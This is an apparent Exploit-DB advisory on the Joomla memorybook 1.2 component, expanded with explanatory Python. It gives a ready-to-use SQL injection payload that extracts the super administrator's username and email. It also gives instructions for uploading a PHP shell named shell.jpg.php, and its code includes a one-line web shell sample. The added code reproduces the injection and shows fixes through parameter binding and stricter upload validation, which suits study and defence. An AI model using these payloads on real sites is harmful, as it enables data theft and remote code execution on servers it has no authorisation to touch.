Joomla! Component memorybook 1.2 - Multiple Vulnerabilities

EDB-ID: 10731

CVE:

Author: jdc

Type: webapps

Platform: PHP

Date: 2009-12-27



SQL Injection
-------------

requires: magic quotes OFF, user account

magic_quotes_gpc must be off because the payload depends on an unescaped
single quote; with it on, PHP rewrites the quote as \' and the injection
fails. A user account is needed because adding an event requires a login.

Add this as the description of a new event:

'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25
LIMIT 1),1,1,1) -- '

NOTE: 63 MUST be replaced with your own Joomla user ID, so that the injected
row is listed under your account. The description goes into the INSERT
without escaping: the leading ') closes the component's own VALUES tuple,
and what follows appends a second row whose second column is a subquery
against #__users. gid=25 is the Super Administrator group in Joomla 1.5, so
that row receives the super administrator's username and email separated
by a space (0x20 is MySQL's hex literal for a space). The trailing --
comments out whatever the component appends after the description. #__ can
be written as-is because Joomla substitutes the configured table prefix
throughout the query string, injected text included. The extracted info can
be found on the View Events page as one of your events.
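The following is an added reproduction of the injection above, not the component's code: the advisory does not show memorybook's INSERT, so the five-column event table (user_id, title, col3, col4, description), the jos_ prefix and the sample users are assumptions chosen so that the advisory's five-value tuple parses. It runs against SQLite, so MySQL's 0x20 is written as ' ' and CONCAT is registered by hand. The vulnerable function splices the description into the SQL text exactly as the advisory implies; the fixed one binds it as a parameter.

```python
"""Added reproduction of the memorybook 1.2 event INSERT (not the component's
own code).  The description is spliced into the SQL text, so the payload's
closing quote and parenthesis end the component's VALUES tuple and a second,
attacker-written tuple with a subquery follows it."""
import sqlite3

TABLE_PREFIX = "jos_"   # assumed site prefix; Joomla code writes '#__' and substitutes it

# The advisory's payload.  MySQL's 0x20 (hex literal for a space) is written as
# ' ' because SQLite reads 0x20 as the integer 32.  63 is the attacker's own ID.
PAYLOAD = ("'), ( 63,(SELECT CONCAT(username,' ',email) FROM #__users "
           "WHERE gid=25 LIMIT 1),1,1,1) -- '")


def replace_prefix(sql):
    """Joomla's setQuery() rewrites '#__' everywhere in the query string, so a
    '#__' inside attacker-supplied text is expanded to the real prefix too."""
    return sql.replace("#__", TABLE_PREFIX)


def fresh_db():
    """In-memory stand-in for the site database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    # MySQL has CONCAT built in; SQLite needs it registered for the payload to run.
    conn.create_function("CONCAT", -1, lambda *parts: "".join(str(p) for p in parts))
    conn.executescript(replace_prefix("""
        CREATE TABLE #__users (id INTEGER, username TEXT, email TEXT, gid INTEGER);
        INSERT INTO #__users VALUES (62, 'admin', 'admin@example.com', 25);
        INSERT INTO #__users VALUES (63, 'attacker', 'attacker@example.com', 18);
        -- Assumed event layout: five columns with the description last, so the
        -- payload's leading ') completes the component's tuple and the subquery
        -- in the second tuple lands in the displayed 'title' column.
        CREATE TABLE #__memorybook_events
            (user_id INTEGER, title TEXT, col3 INTEGER, col4 INTEGER, description TEXT);
    """))
    return conn


def vulnerable_sql(user_id, title, description):
    """The component's pattern: string concatenation, no escaping (magic_quotes off)."""
    return replace_prefix(
        "INSERT INTO #__memorybook_events (user_id, title, col3, col4, description) "
        f"VALUES ({int(user_id)}, '{title}', 1, 1, '{description}')")


def add_event_vulnerable(conn, user_id, title, description):
    conn.execute(vulnerable_sql(user_id, title, description))
    conn.commit()


def add_event_fixed(conn, user_id, title, description):
    """Bound parameters: whatever the description contains, it is one string value."""
    conn.execute(replace_prefix(
        "INSERT INTO #__memorybook_events (user_id, title, col3, col4, description) "
        "VALUES (?, ?, 1, 1, ?)"), (int(user_id), title, description))
    conn.commit()


def view_events(conn, user_id):
    """What the View Events page lists for one account: (title, description) pairs."""
    rows = conn.execute(replace_prefix(
        "SELECT title, description FROM #__memorybook_events "
        "WHERE user_id = ? ORDER BY rowid"), (int(user_id),))
    return [(title, description) for title, description in rows]


if __name__ == "__main__":
    db = fresh_db()
    add_event_vulnerable(db, 63, "My event", PAYLOAD)
    for title, description in view_events(db, 63):
        print(repr(title), repr(description))   # second row: 'admin admin@example.com'
    db = fresh_db()
    add_event_fixed(db, 63, "My event", PAYLOAD)
    print(view_events(db, 63))                   # one row, payload stored as plain text
```

Run against the vulnerable function, the attacker's event list gains a second entry whose title is the super administrator's username and email; with the fixed function the same input is stored verbatim as a description. In Joomla 1.5's own API the equivalent of binding is passing every value through $db->Quote() before concatenation, and the prefix substitution still runs over the whole string afterwards.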


Arbitrary File Upload
---------------------

requires: user account

The original advisory files this as Remote File Inclusion, but what it
describes is an unrestricted file upload: the Add Image screen accepts a
file named shell.jpg.php and stores it where the web server serves and
executes it. Just upload your PHP shell (shell.jpg.php) through the Add
Image screen, and find its new URL in the View Images screen. The name
keeps a .jpg in it for whatever image check the component applies (the
advisory does not say what it checks), while the final .php extension is
what the web server uses to decide to run the file as PHP.
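As an added example, not the component's code, the block below contrasts a check that lets shell.jpg.php through with one that does not. The advisory does not say which test memorybook performs, so the naive function reproduces the common mistake the double extension defeats (reading the first extension rather than the last); the allow-list, magic-byte table and hash-based file names are my choices.

```python
"""Added example of why 'shell.jpg.php' gets through a weak upload check and
how to validate image uploads properly.  Not memorybook's code; the naive
check is an assumed reproduction of the first-extension mistake."""
import hashlib
import os

ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of the formats above (constructed table, not from the page).
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}


def naive_is_image(filename):
    """Assumed weak check: looks at the first extension only, so
    'shell.jpg.php' -> 'jpg' -> accepted, and the file is saved under
    its original name with .php last."""
    parts = filename.split(".")
    return len(parts) > 1 and parts[1].lower() in ALLOWED_IMAGE_EXT


def safe_upload_name(filename, data):
    """Return the name the file should be stored under, or None to reject it.

    - only the LAST extension counts, and it must be in the allow-list;
    - the content must start with that format's magic bytes;
    - the stored name is derived from the content hash, so no client-supplied
      text (and no stray '.php' segment) ever reaches the file system.
    """
    base = os.path.basename(filename)
    _, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED_IMAGE_EXT:
        return None
    if not data.startswith(MAGIC[ext]):
        return None
    return f"{hashlib.sha256(data).hexdigest()[:16]}.{ext}"


if __name__ == "__main__":
    php = b"<?php system($_GET['c']); ?>"
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16      # constructed JPEG header
    print(naive_is_image("shell.jpg.php"))          # True: the weak check passes it
    print(safe_upload_name("shell.jpg.php", php))   # None: last extension is php
    print(safe_upload_name("shell.php.jpg", php))   # None: content is not a JPEG
    print(safe_upload_name("shell.php.jpg", jpeg))  # <hash>.jpg: no 'php' left in the name
```

Regenerating the name matters beyond this advisory's shell.jpg.php: under an Apache AddHandler configuration a file called shell.php.jpg can still be executed as PHP, and a last-extension check alone would accept it. The magic-byte test only rejects files that do not even look like images; a JPEG with PHP appended still passes it, so the upload directory should additionally be kept out of the web root or configured to serve files without executing them.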